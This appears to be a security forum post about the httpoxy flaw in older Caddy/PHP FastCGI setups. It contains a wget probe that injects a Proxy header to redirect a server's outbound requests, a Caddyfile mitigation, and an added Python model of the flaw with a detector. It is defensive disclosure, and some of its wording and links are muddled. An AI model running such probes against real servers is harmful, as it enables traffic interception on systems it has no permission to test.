HTTPOXY Exploit in Caddy environments, again through persistent PHP weaknesses!

We have for instance a Vimeo videoproxybid ; 80 get body, -snt.ru & -proxyzan dot com.
No, I will withhold the exact IP and location… we have to be responsible…

Exploitable with older versions of the Caddy server; run: wget -S --header="Proxy: 1.2.3.4:8080"

One can test this at https://yourdomain.com, grep on info.php
Yes, PHP always stays a 'can of worms'.
A remedy is to strip the header, but how to do this?
Re the manual: https://www.tutorialspoint.com/php/php_split.htm &
https://www.geeksforgeeks.org/split-a-comma-delimited-string-into-an-array-in-php/

127.0.0.1:80 {
    root domains/localhost
    fastcgi / 127.0.0.1:9000 {
        ext .php
        split .php
        index index.php
        env HTTP_PROXY ""
    }
    errors
}

Info credits go to NIXTREN on https://github.com/mholt/caddy/issues/955

Detected thanks to the wonderful folks that map all that insecurity at CENSYS. :wink:

polonus (volunteer webserver error hunter)
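To make the remedy concrete, here is an added Python model (not code from this post or from the Caddy project) of how a client's Proxy header turns into the HTTP_PROXY CGI variable and why blanking it, as the env line in the Caddyfile does, breaks the chain; the request headers and the small HTTP-client model are constructed for illustration.

```python
from typing import Dict, List, Optional

# Constructed request: the Host is the placeholder domain from the post and the
# Proxy header carries the value used in the wget test.
REQUEST_HEADERS: Dict[str, str] = {
    "Host": "yourdomain.com",
    "User-Agent": "Wget/1.20",
    "Proxy": "1.2.3.4:8080",
}

def cgi_env(headers: Dict[str, str]) -> Dict[str, str]:
    """Naive CGI meta-variable mapping (RFC 3875 style): every request header
    becomes HTTP_<NAME> with dashes turned into underscores. This is the step
    that lets a client-chosen 'Proxy' header land in HTTP_PROXY (httpoxy)."""
    env: Dict[str, str] = {}
    for name, value in headers.items():
        env["HTTP_" + name.upper().replace("-", "_")] = value
    return env

def cgi_env_hardened(headers: Dict[str, str]) -> Dict[str, str]:
    """Same mapping, then HTTP_PROXY is forced to the empty string, which is
    what the Caddyfile line 'env HTTP_PROXY ""' does for the PHP FastCGI backend."""
    env = cgi_env(headers)
    env["HTTP_PROXY"] = ""
    return env

def outbound_proxy(env: Dict[str, str]) -> Optional[str]:
    """Models a PHP-side HTTP client (libcurl via getenv, Guzzle, ...) that
    honours a non-empty HTTP_PROXY variable for its outgoing connections."""
    value = env.get("HTTP_PROXY", "")
    return value if value else None

def proxy_header_present(headers: Dict[str, str]) -> bool:
    """Detection: a request carrying a 'Proxy' header (any letter case) has no
    legitimate browser use and is worth logging as a probe."""
    return any(name.lower() == "proxy" for name in headers)

def flag_probes(requests: List[Dict[str, str]]) -> List[str]:
    """Return the Host of every request in a batch that carried a Proxy header."""
    return [r.get("Host", "?") for r in requests if proxy_header_present(r)]

if __name__ == "__main__":
    print("vulnerable:", outbound_proxy(cgi_env(REQUEST_HEADERS)))          # 1.2.3.4:8080
    print("hardened: ", outbound_proxy(cgi_env_hardened(REQUEST_HEADERS)))  # None
```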

For -http://s7.addthis.com/js/300/addthis_widget.js#pubid=rizicn on http://proxyzan.info/
https://www.virustotal.com/gui/url/f641a92d16b2faeef556efc2f01c85dcbe5e282642659e129ba7b6933a8fd6e4/community
Hunt down everything that has more than two IPs and tracks! :slight_smile:
Results from scanning URL: -//s7.addthis.com/js/300/addthis_widget.js#pubid=rizicn
Number of sources found: 41
Number of sinks found: 16 related to -http://avpn.win.site2preview.com/
link: http://avpn.win/edit-browser.php

pol